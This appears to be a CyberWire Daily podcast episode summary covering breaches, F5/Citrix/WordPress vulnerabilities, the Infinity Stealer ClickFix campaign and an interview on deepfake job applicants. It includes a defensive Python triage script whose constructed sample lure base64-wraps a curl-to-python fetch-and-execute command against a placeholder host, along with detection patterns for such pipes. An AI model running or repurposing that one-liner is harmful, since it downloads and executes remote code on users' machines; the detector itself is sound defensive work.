CyberWire Daily – "Inbox Intrusion Hits FBI Chief"
Date: March 30, 2026 | Host: Dave Bittner (N2K Networks)
Episode Overview
This episode dives into a series of headline cybersecurity incidents, including a breach affecting the FBI Director's personal email, a large-scale cyberattack on the European Commission, and multiple high-severity vulnerabilities impacting enterprises globally. A featured Industry Insights interview with Brian Long, CEO & Co-Founder of Adaptive Security, highlights the alarming trend of deepfake job applicants and the evolving threat to organizational identity security.
Key News Stories & Discussion Points
1. Iranian-Linked Hackers Breach FBI Director's Email
[02:07]
- Hackers identifying as Handela Hack Team claim to have breached FBI Director Kash Patel's personal Gmail, leaking photos and over 300 emails.
- The FBI confirmed the account was targeted but stated the material was historical and irrelevant to government operations.
- Handela has ties to Iranian cyber intelligence and is known for attacks aimed at embarrassing U.S. officials amid rising geopolitical tensions.
- Insight: This fits a broader Iranian strategy of using cyber intrusions as low-level retaliatory pressure and signaling capability.
"Analysts say the Patel leak fits a broader Iranian strategy to embarrass U.S. officials and signal reach during ongoing tensions..."
— Dave Bittner [03:22]
2. Shiny Hunters Hit European Commission
[04:09]
- The criminal extortion group Shiny Hunters claim responsibility for breaching the European Commission's Europa.eu web platform.
- An AWS account associated with the platform was compromised—public sites remained online, but sensitive data exposure is suspected.
- Shiny Hunters allege theft of 350+ GB of files and have leaked a 90GB archive.
- Officials are assessing the incident, notifying potentially affected organizations, and ramping up security.
3. Critical Vulnerabilities in F5 and Citrix
[05:15]
- F5: A vulnerability in BIG-IP Access Policy Manager, recently upgraded in severity, allows remote code execution. Over 240,000 exposed systems are at risk, and active exploitation has been confirmed.
- Citrix NetScaler Gateway: A flaw leaks memory contents via SAML requests. Attacks began soon after the vulnerability was disclosed, prompting urgent patching.
- CISA and the UK’s NCSC have directed immediate remediation.
4. WordPress Plugin Exposes Hundreds of Thousands of Sites
[06:28]
- The "Smart Slider 3" plugin, installed on 800,000+ sites, allows authenticated subscriber-level users to read arbitrary files (e.g., configuration details and credentials).
- Rated medium risk, but the scale and reach heighten urgency for administrators.
5. Infinity Stealer Malware Targets macOS
[07:20]
- A new info-stealer, Infinity Stealer, is delivered via fake Cloudflare CAPTCHA pages using sophisticated social engineering.
- Victims are tricked into running a base64-encoded curl command, which leads to Python-based native macOS malware.
- Notable for combining a newer delivery technique (“ClickFix”) with compilation techniques used for evasion.
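The base64-wrapped curl pipeline is the part of this lure a defender can check mechanically before anyone pastes it into a terminal. What follows is an added example, not code from the episode or from any vendor it mentions: a small Python triage script that unwraps base64 blobs found in a pasted one-liner (recursing through nested layers), flags a decode step piped into a shell and a fetch-and-execute pipe, and extracts any URLs it finds at any layer. The sample lure, the benign command and the hostname example.invalid are constructed for illustration and are not taken from the reported campaign.

```python
"""Triage of ClickFix-style one-liners (added example, not from the episode).

Unwraps base64 blobs in a pasted command, flags decode-to-shell and
download-and-execute pipes, and extracts any URLs found at any layer.
"""
import base64
import re
from dataclasses import dataclass, field

# Runs of base64 alphabet long enough to be worth decoding; the length floor
# skips short tokens such as flags and short hashes.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# `... | base64 -d | sh` (macOS base64 also accepts -D and --decode).
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sh|bash|zsh)\b")
# `curl ... | sh` or `wget ... | python3`: fetch and execute in one step.
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash|zsh|python3?)\b")
URL = re.compile(r"https?://[^\s'\"|;&]+")


@dataclass
class Finding:
    suspicious: bool = False
    reasons: list[str] = field(default_factory=list)
    decoded: list[str] = field(default_factory=list)  # one entry per unwrapped layer
    urls: list[str] = field(default_factory=list)


def decode_blobs(text: str, depth: int = 3) -> list[str]:
    """Return printable text recovered from base64 blobs in `text`,
    recursing into each decoded layer so nested encodings are unwrapped."""
    found: list[str] = []
    if depth == 0:
        return found
    for match in B64_BLOB.finditer(text):
        blob = match.group(0)
        padded = blob if "=" in blob else blob + "=" * (-len(blob) % 4)
        try:
            layer = base64.b64decode(padded, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
            continue
        if not all(c.isprintable() or c in "\r\n\t" for c in layer):
            continue  # binary payload, not a command we can read
        found.append(layer)
        found.extend(decode_blobs(layer, depth - 1))
    return found


def analyze(command: str) -> Finding:
    """Explain why a pasted one-liner looks like a ClickFix lure (or why it does not)."""
    finding = Finding(decoded=decode_blobs(command))
    if DECODE_TO_SHELL.search(command):
        finding.reasons.append("base64 output piped straight into a shell")
    for layer_no, text in enumerate([command] + finding.decoded):
        if FETCH_AND_RUN.search(text):
            where = "in the visible command" if layer_no == 0 else f"inside base64 layer {layer_no}"
            finding.reasons.append(f"download-and-execute pipe {where}")
        finding.urls.extend(u for u in URL.findall(text) if u not in finding.urls)
    finding.suspicious = bool(finding.reasons)
    return finding


# Constructed samples (not from the reported campaign); example.invalid is a reserved name.
INNER_COMMAND = "curl -fsSL https://example.invalid/verify/update.py | python3"
ENCODED_INNER = base64.b64encode(INNER_COMMAND.encode()).decode()
LURE_COMMAND = 'echo "' + ENCODED_INNER + '" | base64 -d | bash'
BENIGN_BLOB = base64.b64encode(b"hello world, this is benign").decode()
BENIGN_COMMAND = 'echo "' + BENIGN_BLOB + '" | base64 -d'

if __name__ == "__main__":
    for cmd in (LURE_COMMAND, BENIGN_COMMAND):
        print(cmd, "->", analyze(cmd))
```

The script is deliberately conservative: a base64 blob alone is not a finding (the benign sample decodes cleanly and is not flagged); only the decode-to-shell and fetch-and-execute pipes raise a flag, and the reasons list says at which layer each was seen so an analyst can see through a single level of obfuscation without running anything.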
6. Russian APT "Star Blizzard" Adopts Dark Sword iOS Exploit Kit
[08:31]
- Star Blizzard is targeting Apple devices and iCloud accounts with link-based phishing disguised as Atlantic Council communications.
- Focuses on credential harvesting and intelligence collection, now covering government, legal, financial, academic, and think tank sectors.
7. U.S. Treasury Considers Cyber Insurance Backstop
[09:22]
- Treasury is reevaluating whether catastrophic cyber incidents should be classified as terrorism under the Terrorism Risk Insurance Program (TRIP).
- Attribution and intent challenges make cyber hard to fit under existing TRIP guidelines.
- Concern is rising over private insurance capacity to cover losses from potentially systemic cyber events (e.g., nationwide outages).
8. DHS Closes Investigation into CISA Staff
[10:37]
- Seven CISA staff placed on leave over a failed counterintelligence polygraph related to the then-acting CISA Director have been cleared of wrongdoing.
- Lawmakers call this a “correction” affirming staff acted within their duties.
Industry Insights: Interview with Brian Long, CEO & Co-Founder, Adaptive Security
Topic: Deepfake Job Hires & the New Identity Attack Surface
[14:26–22:36]
The Impersonation Epidemic
How Deepfake Job Applicants Are Changing Insider Risk
- Deepfakes + Social Profiling: Attackers use public data (LinkedIn, data brokers, company org charts) to convincingly impersonate real individuals—voice, visuals, employment history.
- Accessibility & Cost: “Anyone from an 8 year old to an 80 year old” can now engineer such attacks affordably.
"They can have a very coherent conversation with you that really... gets to the point and can get past a lot of your typical controls."
— Brian Long [14:29]
- Remote Work Enables Attacks: Many companies never physically meet new hires for remote roles, opening the door for fake applicants to secure access to sensitive systems.
"Gartner estimates that by 2028, one in four job applicants will be impersonation applicants... almost 25% of applicants will not be real people."
— Brian Long [16:39]
Why Attackers Do It
- Gaining Employee Access: Once ‘hired,’ attackers may deploy ransomware, exfiltrate data, or act as sleeper agents for more insidious espionage.
- Tenure varies: Some attackers only need a day; others may persist for years.
Mitigations and Recommendations
- Awareness: Most non-security staff find the concept of fake applicants “insane”—the first step is education throughout the workforce.
- In-Person Verification: Mandate face-to-face onboarding—even for remote positions—to verify identity with documents and basic employment background checks.
"You should not be hiring someone if you have not met them in real life, and when you meet them... verify it's really them."
— Brian Long [19:33]
- Access Controls: Move toward least privilege and segment access by job function to reduce risk when incidents do slip through.
- Organizations at Risk: Large enterprises are adopting new controls and tools quickly, but mid-market firms (100–10,000 employees) are “not ready for this at all.”
- Getting Started: Free training materials are available for all ages and organizational roles on Adaptive Security's website for education and onboarding assistance.
"Learn the basics... if you want to roll things out customized to your organization, you can sign up to get a demo."
— Brian Long [22:01]
Memorable Quotes
- On the new attack surface:
"AI has made insider risk really redefined to be a risk around deepfakes and impersonation job applicants and ultimately people applying to jobs... who may not exist at all."
— Brian Long [15:45]
- On the scale of the threat:
"Once they get the job, they get access to all the systems, then they can cause all sorts of havoc."
— Brian Long [16:39]
- On education:
"The average person finds this to be totally insane... that someone's going to impersonate someone else to get a remote job at their company..."
— Brian Long [19:33]
Critical Segment Timestamps
- [02:07] – FBI Director's email breach details
- [04:09] – European Commission and Shiny Hunters breach
- [05:15] – F5 and Citrix vulnerabilities
- [06:28] – WordPress plugin vulnerability details
- [07:20] – Infinity Stealer malware analysis
- [08:31] – Russian APT Star Blizzard's new iOS campaign
- [09:22] – U.S. Treasury on cyber insurance backstop
- [10:37] – DHS clears CISA staff in polygraph probe
- [14:26–22:36] – Brian Long on deepfake job hires & solutions
Final Commentary: Bureaucratic Black Box Warnings
[22:44]
- A 2024 review of Microsoft’s Government Community Cloud High revealed ongoing visibility issues. Despite missing documentation, the product was authorized with “proceed with caution” advice, prompting critics to label the approval “paperwork theater.” The incident underscores the growing risks of black-box technologies in critical infrastructure.
This episode delivers a sobering look at the rapid evolution of cyber threats—from geopolitical hacking campaigns to the new era of identity attacks driven by AI and deepfakes. Key takeaways stress the urgent need for awareness, smarter identity controls, and holistic security postures, especially among mid-sized enterprises.
To explore in-depth resources or access free trainings on identity security:
AdaptiveSecurity.com
(Summary excludes advertisements, show intros/outros, and non-content sections.)
